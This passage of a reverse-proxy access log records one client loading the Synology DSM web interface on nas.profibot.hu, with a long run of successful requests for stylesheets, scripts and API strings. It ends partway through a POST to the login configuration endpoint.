"/webman/modules/AudioPlayer/style.css?v=1661757678" [Client 84.1.26.27] [Length 3921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/style.css?v=1661757678" [Client 84.1.26.27] [Length 1934] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 10609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/style.css?v=1661226912" [Client 84.1.26.27] [Length 15876] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/style.css?v=1661757678" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/style.css?v=1661757678" [Client 84.1.26.27] [Length 5614] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/style.css?v=1661421011" [Client 84.1.26.27] [Length 440] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/style.css?v=1661757678" [Client 84.1.26.27] [Length 2311] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerWidget/style.css?v=1661421011" [Client 84.1.26.27] [Length 989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/style.css?v=1660704937" [Client 84.1.26.27] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/style.css?v=1635321605" [Client 84.1.26.27] [Length 4624] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/style.css?v=1661757678" [Client 84.1.26.27] [Length 1433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/style.css?v=1634102886" [Client 84.1.26.27] [Length 72] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/style.css?v=1661757678" [Client 84.1.26.27] [Length 943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 514] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/ScsiTarget/style.css?v=1659958512" [Client 84.1.26.27] [Length 7620] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/OAuthService/style.css?v=1618330426" [Client 84.1.26.27] [Length 333] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/style.css?v=1657097204" [Client 84.1.26.27] [Length 12126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/style.css?v=1733908506" [Client 84.1.26.27] [Length 56578] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/style.css?v=1744186293" [Client 84.1.26.27] [Length 8535] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebStation/style.css?v=1648710000" [Client 84.1.26.27] [Length 4262] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/style.css?v=1657097197" [Client 84.1.26.27] [Length 644] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/style.css?v=1670317322" [Client 84.1.26.27] [Length 17338] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/LogCenter/style.css?v=1657880510" [Client 84.1.26.27] [Length 568] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CodecPack/style.css?v=1662540402" [Client 84.1.26.27] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynoFinder/style.css?v=1670389783" [Client 84.1.26.27] [Length 22699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VPNCenter/style.css?v=1656648365" [Client 84.1.26.27] [Length 1189] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/DirectoryServer/style.css?v=1657077274" [Client 84.1.26.27] [Length 1980] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/DownloadStation/style.css?v=1714372160" [Client 84.1.26.27] [Length 5968] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 84.1.26.27] [Length 1165] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" [Client 84.1.26.27] [Length 3834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyApplicationService/style.css?v=1675505560" [Client 84.1.26.27] [Length 2208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/MediaServer/style.css?v=1733153684" [Client 84.1.26.27] [Length 877] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HyperBackup/style.css?v=1666887595" [Client 84.1.26.27] [Length 20594] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AntiVirus/style.css?v=1676872996" [Client 84.1.26.27] [Length 5538] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858" [Client 84.1.26.27] [Length 75196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/style.css?v=1731304862" [Client 84.1.26.27] [Length 13455] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/DhcpServer/style.css?v=1639559986" [Client 84.1.26.27] [Length 2034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/ActiveInsight/style.css?v=1706865053" [Client 84.1.26.27] [Length 797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 84.1.26.27] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/style.css?v=1711016943" [Client 84.1.26.27] [Length 102604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 84.1.26.27] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 84.1.26.27] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 84.1.26.27] [Length 185] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 84.1.26.27] [Length 4629] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 84.1.26.27] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 84.1.26.27] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/style.css?v=3.0.7-2512" [Client 84.1.26.27] [Length 14820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ext-all.js?v=1650348555" [Client 84.1.26.27] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 84.1.26.27] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 84.1.26.27] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.js?v=1650348555" [Client 84.1.26.27] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/constants.js?v=1650348555" [Client 84.1.26.27] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js?v=1650348555" [Client 84.1.26.27] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue/vue.min.js?v=1633587521" [Client 84.1.26.27] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vuex/vuex.min.js?v=1585722123" [Client 84.1.26.27] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 84.1.26.27] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:07 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 84.1.26.27] [Length 585070] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/sodium.js?v=1650348555" [Client 84.1.26.27] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js?v=1654081517" [Client 84.1.26.27] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.js?v=1678269761" [Client 84.1.26.27] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 84.1.26.27] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.wasm" [Client 84.1.26.27] [Length 159335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:08 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=40438" [Client 84.1.26.27] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/2.style.css" [Client 84.1.26.27] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 84.1.26.27] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 84.1.26.27] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 